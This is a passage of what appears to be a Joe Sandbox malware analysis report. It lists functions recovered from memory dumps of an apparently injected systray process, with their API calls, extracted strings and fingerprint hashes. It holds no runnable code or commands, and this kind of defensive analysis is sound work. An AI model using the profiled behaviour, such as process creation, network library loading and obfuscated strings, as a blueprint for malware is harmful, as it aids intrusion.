                                                                  • Opcode Fuzzy Hash: 490da627e748a9750414c6b90dd52b2af185088a062f9d8a536850bfdecb2728
                                                                  • Instruction Fuzzy Hash: 9790022224546112F150715C45056164005EBE1205F55C261A0855595D8955D9566221
                                                                  Function 00AD3A40 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 257COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 0-1269752229
                                                                  • Opcode ID: f5ccac13697174ec231668e25c50ef8a029c1f2222106b193210969eab252171
                                                                  • Instruction ID: 1fc22a16f91bd7c8a7a9dcb4d12e132cb7752e6b6f477c03f923f67a768bfc61
                                                                  • Opcode Fuzzy Hash: f5ccac13697174ec231668e25c50ef8a029c1f2222106b193210969eab252171
                                                                  • Instruction Fuzzy Hash: EB81A872605781AFCB11DF24C886BEAFBB8FF45310F14465EE59A9B342D7316A01CB92
                                                                  Function 00ACF63B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeUninitialize
                                                                  • String ID: @J7<
                                                                  • API String ID: 3442037557-2016760708
                                                                  • Opcode ID: b5f9551d4bf3beb6514102cb83c05c40bdfbce06737bb5c6df2bc5480c0f2abf
                                                                  • Instruction ID: 8b9c730281978b3185555926e19de8593f4c7030e6f78d2aaaf2f6bffb513ba0
                                                                  • Opcode Fuzzy Hash: b5f9551d4bf3beb6514102cb83c05c40bdfbce06737bb5c6df2bc5480c0f2abf
                                                                  • Instruction Fuzzy Hash: 103123B5A00609EFDB00DFD8D880DEEB7B9BF88304B118559E955E7214D775EE05CBA0
                                                                  Function 00ACF640 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeUninitialize
                                                                  • String ID: @J7<
                                                                  • API String ID: 3442037557-2016760708
                                                                  • Opcode ID: 06e59bfc35feeb982c47c7e53796437bb8801e0190597e6a80f2f52de1a1a31c
                                                                  • Instruction ID: 8096078255d0100706e3db3149cba1d069c4a5834ae33b9f8c31ca4fa51afee9
                                                                  • Opcode Fuzzy Hash: 06e59bfc35feeb982c47c7e53796437bb8801e0190597e6a80f2f52de1a1a31c
                                                                  • Instruction Fuzzy Hash: B13130B5A0060AAFDB00DFD8D880DEFB7BABF88304B118559E505EB214D775EE05CBA0
                                                                  Function 00AD3BE0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 96sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000007D0), ref: 00AD3CBB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 3472027048-1269752229
                                                                  • Opcode ID: 6977e1f1069a8bfa9e38ab5dc357e0a120a5636496327200c40b030ff972773d
                                                                  • Instruction ID: ca13b7415c187b2ebea8def3ecda6fafd297d8cbaf041cbc65fb86ac38738687
                                                                  • Opcode Fuzzy Hash: 6977e1f1069a8bfa9e38ab5dc357e0a120a5636496327200c40b030ff972773d
                                                                  • Instruction Fuzzy Hash: CD31DFB1A45305BBCB10DF60C881FEAB7B9FF84304F10452DEA1A6B340D774AA40CBA1
                                                                  Function 00AC46A0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AC4712
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                                  • Instruction ID: 3ca11daae5bfd12e4df511b435d57a43472b923119490a43e7ee3f8dd528aa54
                                                                  • Opcode Fuzzy Hash: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                                  • Instruction Fuzzy Hash: BD0121B6D4020EABDF10EBE4DD42FDEB3B89B54308F004195E91997241F631EB14CB91
                                                                  Function 00AD9A10 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,00AC845E,00000010,?,?,?,00000044,?,00000010,00AC845E,?,?,?), ref: 00AD9A73
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateInternalProcess
                                                                  • String ID:
                                                                  • API String ID: 2186235152-0
                                                                  • Opcode ID: cd0296cf9238abdedae7624c92a7e3debef023e4f7cc1ae673f7c9365dc304a1
                                                                  • Instruction ID: 5d6c3d93729394f02b84439b028d15f5719004eabcb52f5260056688890d6df4
                                                                  • Opcode Fuzzy Hash: cd0296cf9238abdedae7624c92a7e3debef023e4f7cc1ae673f7c9365dc304a1
                                                                  • Instruction Fuzzy Hash: 7E01CCB2200148BFCB04DE99DC91EEB77ADEF8C714F508208BA19E3281D630F8518BA4
                                                                  Function 00AB9EC0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00AB9F05
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: b12b393f118a8295544c15101f484bb8c07bd4948d29356ae4d4f5285100f024
                                                                  • Instruction ID: ea780a584e85c8c3529f2ca8336f54f0cc647acc51267892036bfc2374607897
                                                                  • Opcode Fuzzy Hash: b12b393f118a8295544c15101f484bb8c07bd4948d29356ae4d4f5285100f024
                                                                  • Instruction Fuzzy Hash: 57F06D7338421436E23066A9AC03FE7B79CDB80B71F140426F70DEB2C1E992B81182E4
                                                                  Function 00AB9EBA Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00AB9F05
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: 7e8308594433b2d1d38497223bffc2dcea9e93ca053d5d3f1fb4653febd412f1
                                                                  • Instruction ID: 9daf64178f88bc7d588402900b041c10934aed4a9473f69c5502ce9e49ed6f1d
                                                                  • Opcode Fuzzy Hash: 7e8308594433b2d1d38497223bffc2dcea9e93ca053d5d3f1fb4653febd412f1
                                                                  • Instruction Fuzzy Hash: 62F0927738420036E23066A89D03FE7779D8F90B60F58041AF709EB2C2D9A6751587A4
                                                                  Function 00AD9980 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5B5E5FE1,00000007,00000000,00000004,00000000,00AC3F0A,000000F4), ref: 00AD99BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                                  • Instruction ID: f247a7ece92fe6a2b84667fd8cacc4d10baa31c430a5058d84682ca664cae7d3
                                                                  • Opcode Fuzzy Hash: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                                  • Instruction Fuzzy Hash: 72E06D712007447FE610EE99DC41EDB33ADEFC5710F404409FD18A7242CA70B9118AB4
                                                                  Function 00AD9930 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00AC1B79,?,00AD60DF,00AC1B79,00AD57BF,00AD60DF,?,00AC1B79,00AD57BF,00001000,?,?,00000000), ref: 00AD996F
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                                  • Instruction ID: 33b854687aa63178719fd3eea2bd06c50e1c33c76baf2137040364c3220371c4
                                                                  • Opcode Fuzzy Hash: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                                  • Instruction Fuzzy Hash: B0E09271600244BFC610EE98DC42FDB73ADEFC8710F404009FD08A7282C670B92187B4
                                                                  Function 00AC84A0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00AC84CC
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 60edccb0ba47fa3321c4387d612a709d1484dd626286a532c5630f6e5dfc211b
                                                                  • Instruction ID: f212d54681c2a2e2afcbf629bd4117ad293986f2e30937c824b102fbfcfd237f
                                                                  • Opcode Fuzzy Hash: 60edccb0ba47fa3321c4387d612a709d1484dd626286a532c5630f6e5dfc211b
                                                                  • Instruction Fuzzy Hash: 12E0267124020827EB286BA8DD46F73335CAB48724F0906A5B91CCF6C5F93DF8028150
                                                                  Function 00AC8499 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00AC84CC
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 7b8c93237cec7d8edb5c133dea6e8ac4c563d1ac5f1c8e99e23de68a61dd1299
                                                                  • Instruction ID: ae8117c701b4f44b9f97932ce573abed1ebf8989688bef6307f6a28e207fabbf
                                                                  • Opcode Fuzzy Hash: 7b8c93237cec7d8edb5c133dea6e8ac4c563d1ac5f1c8e99e23de68a61dd1299
                                                                  • Instruction Fuzzy Hash: 81E0267510020827EB386B68CE86F73335C7B48B30F094658B92CDF6C5E97CF9024250
                                                                  Function 00AC8290 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00AC1E80,00AD80FE,00AD57BF,00AC1E46), ref: 00AC82C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: d2ae084e7750a1bf883497dd8e2d79e356aeae5b5f395dd8145bf6eb53b565e6
                                                                  • Instruction ID: cf46087cbf7304c687ddda7d4e471da72a31fc9332e462ef98785ccae23b576b
                                                                  • Opcode Fuzzy Hash: d2ae084e7750a1bf883497dd8e2d79e356aeae5b5f395dd8145bf6eb53b565e6
                                                                  • Instruction Fuzzy Hash: 3AD05EB12883043BF650A7E5DD07FA6369D6B40764F054468BA48DB2C3FD66F4104165
                                                                  Function 00AC0F4B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostThreadMessageW.USER32(?,00000111), ref: 00AC0F57
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID:
                                                                  • API String ID: 1836367815-0
                                                                  • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                  • Instruction ID: e44cd6ccd791be5ffce4e23e50b6858cff68a5e9e4e35dc1cba126d6339328b9
                                                                  • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                  • Instruction Fuzzy Hash: 05D0227BB4000C7AAA1246C4ACC1DFFB72CEB84BA6F00406BFF08E2040E6218D020BF0
                                                                  Function 04B12C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 7dbebbadfe8ff99af7f74fa904d9e54418a9c7800e5163fa84ac5eca3703dac7
                                                                  • Instruction ID: a90834cd68c799221f9cd92992c2bb6efaf5254894cfdc6b684fd5dd39cd6fd1
                                                                  • Opcode Fuzzy Hash: 7dbebbadfe8ff99af7f74fa904d9e54418a9c7800e5163fa84ac5eca3703dac7
                                                                  • Instruction Fuzzy Hash: CCB09B729015D5D6FB15F76047097177900EBD1705F55C1E1D3071643E4738D1D1E175

                                                                  Non-executed Functions

                                                                  Function 048EDED4 Relevance: 56.5, Strings: 45, Instructions: 209COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4781931793.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_48e0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                  • API String ID: 0-3558027158
                                                                  • Opcode ID: 8ca718d367b934c1f3181d35a11771b5b6ef61d0648c5f42973332d07e380016
                                                                  • Instruction ID: 9cee3e2d07af816b537d31b343a4b4403f4974eefb29f26ae264a61a1bfb6f43
                                                                  • Opcode Fuzzy Hash: 8ca718d367b934c1f3181d35a11771b5b6ef61d0648c5f42973332d07e380016
                                                                  • Instruction Fuzzy Hash: AF9151F04082948AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                                  Function 04B12890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: 179ef4c5ef9e3728f162a3b1d0d8530b93af0e0a0c5bda59978cf65680e705c5
                                                                  • Instruction ID: 9d0c108bcfec23835dfa8ab6e452d743a652b96637148b190141f3b6ac537361
                                                                  • Opcode Fuzzy Hash: 179ef4c5ef9e3728f162a3b1d0d8530b93af0e0a0c5bda59978cf65680e705c5
                                                                  • Instruction Fuzzy Hash: 8951D7B5A00116BFDB14DFAC899097EFBB8FF4824475081E9E469E7641E334FE509BA0
                                                                  Function 04B82410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: 47e56a2180bbc59e4a73bc883587097e85e5d623d6d14527ee7d02de11815fd1
                                                                  • Instruction ID: 81513a8d32cc25d206dfbd4422396846f1a4c35418747fd429c5e358061d174b
                                                                  • Opcode Fuzzy Hash: 47e56a2180bbc59e4a73bc883587097e85e5d623d6d14527ee7d02de11815fd1
                                                                  • Instruction Fuzzy Hash: 2D5103B5A40645AFDF28EE9CC9908BFB7F8EF44204B4484DDE996D7641E674FA00CB60
                                                                  Function 04B07630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04B44787
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04B44742
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04B44655
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04B446FC
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04B44725
                                                                  • ExecuteOptions, xrefs: 04B446A0
                                                                  • Execute=1, xrefs: 04B44713
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: 99ee504f004e3e4c7bc82acf3ac2d479d4d075792c3ef4b114a1e8da979a4972
                                                                  • Instruction ID: a240c8be4ce41eb2a13c7cb0173d6f1fa80aafa63e450628f9ebba82937280b4
                                                                  • Opcode Fuzzy Hash: 99ee504f004e3e4c7bc82acf3ac2d479d4d075792c3ef4b114a1e8da979a4972
                                                                  • Instruction Fuzzy Hash: E15127716002097AEF11ABA4DC99FBABBA8EF48345F0440D9E506A71D1EF71BE41CF90
                                                                  Function 04B1B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction ID: 82b5832cc96a0a5c58984aaf93264fb89a9bdb64c60723476035c10040659939
                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction Fuzzy Hash: E181A170E092499EEF248F68C8917FEBBB1EF55710F984599E861A72B0D734B940CB60
                                                                  Function 048E3BE1 Relevance: 8.8, Strings: 7, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4781931793.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_48e0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: EYPb$F\Z[$PW~\$[QGZ$fTST$w@\Y$xZO\
                                                                  • API String ID: 0-1522131713
                                                                  • Opcode ID: 812d392b6bd7c5ec01e296ea9a61cc5e77fb92519fbc9d1b5007f91b56649fb0
                                                                  • Instruction ID: 4d2187c69c496a9633636bca22bbd094f328c9a66c84a929d3560da4c9507237
                                                                  • Opcode Fuzzy Hash: 812d392b6bd7c5ec01e296ea9a61cc5e77fb92519fbc9d1b5007f91b56649fb0
                                                                  • Instruction Fuzzy Hash: 1F3136B080474CDBDB08DF81E554ADEBBB1FF00759F814019E82A7F204D7718669CB89
                                                                  Function 04AFF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B402E7
                                                                  • RTL: Re-Waiting, xrefs: 04B4031E
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B402BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  • Opcode ID: 40f3eb3d33a4605c02281a1f7dce44c30e216b8e9ec2e29c4c9d9dd6a3f16d1d
                                                                  • Instruction ID: fe71f748b4f911fb4fade739b77afbfeaa89a41c8e057c87e366a90f138fff35
                                                                  • Opcode Fuzzy Hash: 40f3eb3d33a4605c02281a1f7dce44c30e216b8e9ec2e29c4c9d9dd6a3f16d1d
                                                                  • Instruction Fuzzy Hash: 2EE1BE706047419FDB24DF68C884B2AB7E0FB88714F140A9EF6A58B2E0E774F845DB42
                                                                  Function 04B0BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04B47B7F
                                                                  • RTL: Re-Waiting, xrefs: 04B47BAC
                                                                  • RTL: Resource at %p, xrefs: 04B47B8E
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
